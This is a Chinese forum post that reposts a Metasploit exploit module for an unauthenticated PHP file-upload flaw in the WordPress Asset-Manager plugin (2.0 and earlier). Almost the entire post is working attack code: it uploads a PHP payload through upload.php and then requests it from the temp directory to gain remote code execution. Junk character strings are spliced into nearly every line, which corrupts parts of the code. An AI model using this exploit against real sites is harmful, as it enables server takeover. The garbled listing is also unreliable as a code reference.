这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。" Y0 n: M9 t: ^* l: t
% c9 N5 ^) s$ X: o5 b##
' Y/ ^ T# }! {( k5 l- W" r# This file is part of the Metasploit Framework and may be subject to
: }+ p# B' x: n" T' b: U; W; n4 H# redistribution and commercial restrictions. Please see the Metasploit5 G3 L: z( m: {/ n4 b- {+ f8 P p6 C9 D
# Framework web site for more information on licensing and terms of use.
0 i$ _% _4 Y# s0 l0 q+ Q: |# h# http://metasploit.com/framework/
7 g( Y' i3 c Z+ u0 l2 N1 N##+ p7 U8 Z- o9 r
1 X, l* Y+ k H ]4 vrequire 'msf/core'
- U5 h0 V+ B, p$ r9 krequire 'msf/core/exploit/php_exe'
@9 p0 J2 ^) |" M
' r6 b V4 m7 ?8 V1 k% L9 @6 [7 Hclass Metasploit3 < Msf::Exploit::Remote& j8 w8 y5 v! X" y; X
Rank = ExcellentRanking
$ [+ Z% E. M% L: p9 J0 t, q
, P7 O, r ^% K" v: Z5 E include Msf::Exploit::Remote::HttpClient3 I* X, `8 g4 \2 d- w" p* F
include Msf::Exploit: hpEXE
/ [; Z! Q" M$ ]" f0 r
! E; _* @ C+ {+ D/ ~- U def initialize(info = {})* Z; R" }2 b2 f! H3 [
super(update_info(info,
1 C" V. F4 X, A 'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',4 {) r8 Z4 F8 q; P8 O' E
'Description' => %q{/ K5 E. j* M; ]6 }, K
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
; m* D1 u! S: R$ v plugin. By abusing the upload.php file, a malicious user can upload a file to a
L4 _! w& U( H- u" K9 j, j temp directory without authentication, which results in arbitrary code execution.
+ p: b l1 s _! b5 @ },
* Y: Q1 H' z, Z5 a0 j, }$ z 'Author' =>! U/ W0 P0 k. C6 y4 ?
[
% C5 }- p! N' K! K, o, s 'Sammy FORGIT', # initial discovery9 T7 C, N" `& n1 b9 }
'James Fitts <fitts.james[at]gmail.com>' # metasploit module
' {+ }( E |: t9 Q ],) \' ]; h+ F8 T. N" t9 e* ^
'License' => MSF_LICENSE,
t5 O, a& B% R* ~: M' f 'References' =>
0 a9 _, a+ O8 c [! \: p5 q+ a3 N
[ 'OSVDB', '82653' ],8 W( D0 b( K4 ?6 J2 }- [5 Q# b
[ 'BID', '53809' ],% U" t& _1 | |+ P1 b/ h3 t1 K% L6 |
[ 'EDB', '18993' ],
- T4 e! x6 e6 \7 E8 g9 x% e [ 'URL', 'http:// www.myhack58.com /' ]
) i7 E6 R$ u4 {; E( A ],. G* ^+ o1 R; C2 h7 ]. M
'Payload' =>/ D( @, V% f7 p2 B2 }$ m
{
" X- ], e" Z! k 'BadChars' => "\x00",
+ s! ~" E) p* P [- W },
; }7 Y3 x3 {! v( y& l8 F. [" i6 B 'Platform' => 'php',
$ O" A3 a# A8 I 'Arch' => ARCH_PHP,
* q- E' L- B5 P& N2 a! @4 `8 Y g 'Targets' =>& i G2 ]% s S! ?
[
' P- E0 F* a5 c4 n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
4 t7 \' U1 ?7 y& Q. K4 |2 _ [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
4 W0 n/ K' x P# Q ],2 {5 }7 {/ ]" Q1 r+ W7 U9 L, | `8 {
'DefaultTarget' => 0,/ D0 s* n. r7 W. {5 r% D3 b9 I
'DisclosureDate' => 'May 26 2012'))
4 O4 O* r* k5 J+ E! W ; Q9 ]" d2 o6 h
register_options(
) `: |" _5 {6 t [$ _" ]( h( h8 s/ Z9 g+ p! Z P1 O
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
5 H5 {+ G- X* j- _7 h ], self.class)! i" d8 j2 i7 p$ Z6 P/ r: d) m7 [
end' o7 \ G/ b3 S; [3 G
. n- p" y' Y& [8 c- @5 ] def exploit( w+ w' z8 s' u4 Y* t! ?2 F. M K" n
uri = target_uri.path$ d8 c- S9 K! I# a/ O# S/ |
uri << '/' if uri[-1,1] != '/'! R' \) N. K7 |. F: ~/ r6 I1 K
peer = "#{rhost}:#{rport}"4 I) a: ]5 ?+ N# f: Y P, I6 z
payload_name = "#{rand_text_alpha(5)}.php"# O- f( a* d% L6 F2 b$ b8 x
php_payload = get_write_exec_payload(:unlink_self=>true)% D" ~" g+ ?% u' G/ B2 ~- U
! e/ j& i2 l/ u4 Q, v
data = Rex::MIME::Message.new
8 \, \( ^% n3 M( s3 k5 r data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")+ o0 m$ Z- `$ ?; [
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
2 Z- |: x& W0 g, y$ U! g0 j
9 f4 P0 u( J- m4 T; v- L/ i' b print_status("#{peer} - Uploading payload #{payload_name}")# N' H: e* n4 Q
res = send_request_cgi({6 ]/ M1 z1 [9 z' p
'method' => 'POST',
( [3 Q3 F( \0 [: V9 v/ G 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",
" d' _& H: l, Z 'ctype' => "multipart/form-data; boundary=#{data.bound}",
1 G! `7 I+ {$ _8 J) V 'data' => post_data
* F+ c, p0 C; p; k }) N6 J* u* @: e1 c( }' Y& w
0 W$ t) S7 ^" P, Z: S6 Q
if not res or res.code != 200 or res.body !~ /#{payload_name}/
( u- Y; p R- E4 m fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed") u1 G% p5 A' h; H9 T) j$ J1 `/ C
end G+ a3 h9 _ ^! Y$ z! H- x
% r' Q( \+ f! L( k! C+ w
print_status("#{peer} - Executing payload #{payload_name}")$ ^+ ?1 c+ P! n( L# D
res = send_request_raw({
9 O. u: c/ j0 [& I, b 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",/ K9 ^3 Z- _) S9 B: `$ y' W( Z
'method' => 'GET'% w3 G% G& c5 t' h
})$ \$ ^1 O' J. o" ?, t" C1 d
8 m" j$ `0 A4 C. t if res and res.code != 200
3 x4 m, Y: d, n fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
/ L7 @: O6 u' O1 l, L ]+ Z end0 O* P8 d3 T% S8 P2 H- k7 @- f
end6 n6 R; ^ i7 i- j; O
end
4 O: C! g$ k) v |
发表于 2012-12-31 09:22:33
收藏
支持
反对